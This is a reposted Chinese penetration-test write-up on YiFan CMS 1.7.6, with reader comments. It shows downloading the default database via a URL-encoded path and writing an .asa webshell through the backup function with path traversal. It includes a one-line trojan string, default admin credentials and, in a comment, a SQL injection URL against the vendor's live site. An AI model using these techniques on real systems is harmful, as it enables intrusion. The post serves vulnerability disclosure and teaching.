CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

艺帆cms

2018年11月18日 698点热度 0人点赞 0条评论

艺帆cms
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
渗透测试实战案例:艺帆CMS漏洞分析和官网测试 p0tt1认证作者2013-12-09共408481人围观 ,发现 30 个不明物体 WEB安全
首先,这个艺帆cms的官网、论坛、演示站,从老版本我就测试和提交给官方了

可惜石沉大海 希望能够重视啊~

1. 环境
本地虚拟机搭建IIS+YF_CMS1.7.6V最新版

官方网站seo.i5808.com

资源标题:艺帆企业CMS1.7.6V

演示网站:http://seo.i5808.com

官方论坛:http://www.i5808.com

关键词:艺帆企业CMS1.7.6V,YifanFCMS,免费cms,企业CMS

类型:asp/access

功能:单页设置 单页分类设置 新闻 产品 下载 在线招聘 在线留言 会员系统 在线下单 幻灯管理 友情链接管理 数据库备份

艺帆企业CMS1.7.6V蜕变上线_全新后台界面!全新通用模板

集成1.7版本中的全部优势项目,
1.7.6版本以其它版本的区别:更加简约方便的后台管理设计,因为很多用户反应,取消了艺帆以往版本中一直有的异步加载功能。

更新:对整体数据结构和读取方式进行了优化,界面全新设计,取消之前版本中使用率偏少的JS脚本,加快运行,新增了插件拓展功能(更多艺帆企业CMS插件陆续上线中),;

特色功能:简约代码,让你的网站轻快流畅。全站DIV+CSS 自动伪静态.html结尾 关键词自动匹配设置 全面针对搜索引擎优化。图片批量上传,省去一张张上传的烦恼;

模板库:精准行业定位,发现品牌设计的价值。每一个企业网站模板都属于自己的一个调性,亦或是可以说是一个卖点(产品诉求),一种情感的表达。我们一直在设计中融入这样的氛围,带入浏览者的感觉;

安全:道高一尺,强力保护您的爱站,不定时收集反馈BUG和漏洞,不定时的更新安全防护。让您的爱站每天接受体检,享受免费医疗的福利。(真的吗? 原来提交咋不理我呢~)

其他说明:首页幻灯才用JS而非Flash ,搜索引擎蜘蛛更能识别并爬到相关链接,没有缩略图的新闻会自动显示暂无图片,所有链接图片均有alt注释和title标注 全站完整无错,如无法架设可以去论坛看下教程

后台地址:i5808 账号:i5808 密码:123456

2. 目的
测试新版YF(艺帆)_CMS1.7.6V

3. 流程
访问看下首页,新版本布局改动挺大的~

艺帆首页

直接访问下后台吧~

艺帆后台

恩。挺漂亮的,好吧,看看怎么获取账号密码吧~

注入看来是不行的,新版对sql注入好像修正了不少~

我们直接看默认数据的路径和默认名吧~

OneFCMS_Data/OneFCMS$%#$#Data$%#2012#$11$$#7.mdb
直接测试官网下

返回

默认数据返回

好吧,看来有井号不行,直接改下编码

编码修改a

恩,然后访问:

OneFCMS_Data/%4F%6E%65%46%43%4D%53%24%25%23%24%23%44%61%74%61%24%25%23%32%30%31%32%23%24%31%31%24%24%23%37%2E%6D%64%62
丢给迅雷

迅雷测试链接

好了 直接就下载了~~不做防下载处理,直接文件名加井号,这个太不负责任了撒~打开数据库看下管理员账号密码:

打开数据库看下管理员账号密码

很好,解密后我们登陆后台~

艺帆后台登陆

后台风格做的不错哈~

然后我们果断找到数据库备份的地方

数据库备份

看看能不能直接备份成asp

无法备份成A'S'P

看来是不行的,但是这种过滤往往是黑名单,不允许asp,意味着aspx也不行,好在我们有asa和cer可以用,来试试看~

备份数据库

这里我加了两个../意思是往上级目录跳两级,顺便测试父路径封锁了没,如果备份好的路径不能执行脚本的话,我们就可以用这个漏洞吧马写到别的目录里面去,顺便测一下吧~

备份数据库

恩,asa成功写入,父路径看来也跳成功了~

声明下,我这里是在文章编辑里上传了一个一句话木马的图片,把图片直接备份成asa的马,当然大家可以随意找地方写一个数据库一句话木马:┼攠數畣整爠煥敵瑳∨≡┩愾,然后备份整个数据库成.asa的马。都可以~

好的,访问下木马试试,刚才我吧路径等于是跳到根目录了~

跳转到根目录

恩成功的显示了图片的内容,木马的内容应该执行了,接着菜刀连接吧~

OK,菜刀连接正常。

接着我们看看为什么新版本的注入漏洞都没了。

详细文件列表

这里后台有一个很灵活的防注入插件啊,封几个语句的话,注入估计就有难度了。

好吧,接着我们测测官网有木有这个数据库漏洞~

测试官网数据库漏洞

毫无疑问,我是掉进坑里的,~这个数据库可下载的漏洞提交给官方好几次了,不重视啊~好心当驴肝肺了,算了,就不搞他了截图走人。

对了,更坑爹的是,官网的密码是他们的客服QQ号,搞社工的 应该是秒进后台吧?

4. 总结
1.数据库默认路径默认数据库名未做放下载措施
2.数据库备份漏洞
未过滤asa,cer等等可执行脚本后缀名
未禁用父路径写文件
3.官网弱口令,直接就用QQ号当后台密码
*本文作者:p0tt1,转载请注明来自 FreeBuf.COM

p0tt1
p0tt1
21 篇文章
等级: 6级
||
上一篇:世界第一个XSS攻击蠕虫的原理下一篇:FBI追踪Tor用户使用的Firefox漏洞利用程序
这些评论亮了

h3len 回复
为啥FB要河蟹我的大名? 我是嗨len!我是轮哥!
)26(亮了

骸綸 回复
我刚取的中文名字,反正高考不考英语了。
)13(亮了
发表评论已有 30 条评论

h3len 2013-12-09回复 1楼
为啥FB要河蟹我的大名? 我是嗨len!我是轮哥!

亮了(26)

phper 2013-12-09回复 2楼
本来来看看文章的说,刚想膜拜楼主,还是先膜拜下楼上不死的轮哥吧~

亮了(4)

kiss 2013-12-09回复 3楼
现在这些开源的项目都这样 ~为的是出名了后面卖钱~

亮了(4)

yf_cms 2013-12-09回复 4楼
楼主 是因为我们没给你回应和奖品么

亮了(4)

pnig0s 认证作者(7级) FreeBuf技术处书记 2013-12-09回复
@yf_cms 请官方验明正身:)

亮了(2)

骸綸 2013-12-09回复 5楼
我刚取的中文名字,反正高考不考英语了。

亮了(13)

懦夫 2013-12-09回复 6楼
你们有没有考虑过官方的感受 ,虽然他们很烂!

亮了(4)

123 2013-12-10回复
@懦夫 强者不需要考虑弱者的感受

亮了(3)

河蟹 2013-12-09回复 7楼
这他喵也太弱了

亮了(5)

abu 2013-12-09回复 8楼
太弱了。。

亮了(2)

龙腾 2013-12-10回复 9楼
膜拜 我是来关注楼主的 楼主的团队 出的工具都不错 期待 工具还在Freebuf发布吗

亮了(2)

shingoxray (1级) 2013-12-10回复 10楼
软文的节奏。

亮了(5)

init5 认证作者(3级) 招商银行安全员 2013-12-10回复 11楼
现在流行复古吗

亮了(3)

河蟹 2013-12-10回复 12楼
安全漏洞还是安全威胁,LZ搞错了吧

亮了(2)

邻国那个谁 2013-12-10回复
@和谐 父路径可写 应该是漏洞了!

还有可以允许备份成asa本来只是安全威胁!

但是从文章看,程序已经做了限制和检查不让asp备份,那么这个时候允许备份asa就成了漏洞了~限制和过滤不严格的漏洞!其实还不如不检查,那样商家可以厚着脸皮说 这只是个安全威胁,都是使用者的错!

亮了(4)

litdg 认证作者(6级) FB作者 2013-12-10回复 13楼
赞一个

亮了(2)

小飞侠xl (1级) 2013-12-10回复 14楼
学习了~

亮了(2)

dealing 2013-12-10回复 15楼
楼主你在FB这么屌,你家里知道吗?

亮了(5)

p0tt1 认证作者(6级) 黑客叔叔,RainRaid和SniFFeR.Pro团队负责人 2013-12-10回复
@dealing 很不幸,我家里完全不知道~而且我也不屌~5555555

只求和基友们一起捡肥皂~

亮了(3)

落叶纷飞 (2级) 2013-12-10回复 16楼
无聊

亮了(2)

y3 2013-12-10回复 17楼
比XXX (一)(二)(三)

那片长篇写的都有水平……虽然是个短篇

口可 口可

亮了(3)

anonymous 2013-12-10回复 18楼
真jb复古,十年前的技术了.

亮了(2)

p0tt1 认证作者(6级) 黑客叔叔,RainRaid和SniFFeR.Pro团队负责人 2013-12-10回复
@anonymous 恩 其实是20年前的技术了 我也很纳闷为甚么这些玩意还存在 还是最新版本 还那么多人用~

就像arp,ddos,cc一样,不知道是多少年前的技术了~不知道为啥那么多攻击还基于这些~

亮了(4)

凡雨 (2级) 2013-12-10回复 19楼
学习一下。。。。。

亮了(2)

河蟹 2013-12-10回复 20楼
hehe………..

亮了(2)

softbug 认证作者专栏作者(7级) i am here! 2013-12-10回复 21楼
学习一下噢 这种经典的文章

亮了(2)

nnaa 2013-12-11回复 22楼
http://seo.i5808.com/so/?key=%E9%A6%99%E6%B8%AF%25%27+and+1%3D1+and+%27%25%27%3D%27&t=2&image.x=67&image.y=15

随手就找到一个搜索型注入了,过滤得没那么好啊

亮了(4)

liuan (1级) 2013-12-16回复 23楼
找了一下,使用这个后台的都有这个漏洞。

亮了(0)

小`白 (1级) 2014-04-01回复 24楼
赞一个

亮了(0)

艺帆cms (1级) 2014-08-15回复 25楼
支持啊!兄弟!看来我们的产品太薄弱了

亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
p0tt1
p0tt1认证作者

黑客叔叔,RainRaid和SniFFeR.Pro团队负责人

21
文章数
240
评论数
最近文章
温州数字电视是如何被黑的 ?
2015.06.08

裸奔吧!APP:揭秘安卓UC浏览器与PP助手私密文件夹羞羞的事情
2015.02.11

喧嚣背后的真相:12306数据泄露事件深度分析
2014.12.26

浏览更多
相关阅读
对zend framework xxe injection 的分析雅虎邮箱XSS漏洞细节分析如何使用深度学习检测XSS一种结合了点击劫持、Self-XSS、复制粘贴劫持的新型XSS攻击谈谈鱼叉式网络钓鱼黑箱粉碎机
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank

标签: 暂无
最后更新:2018年11月18日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me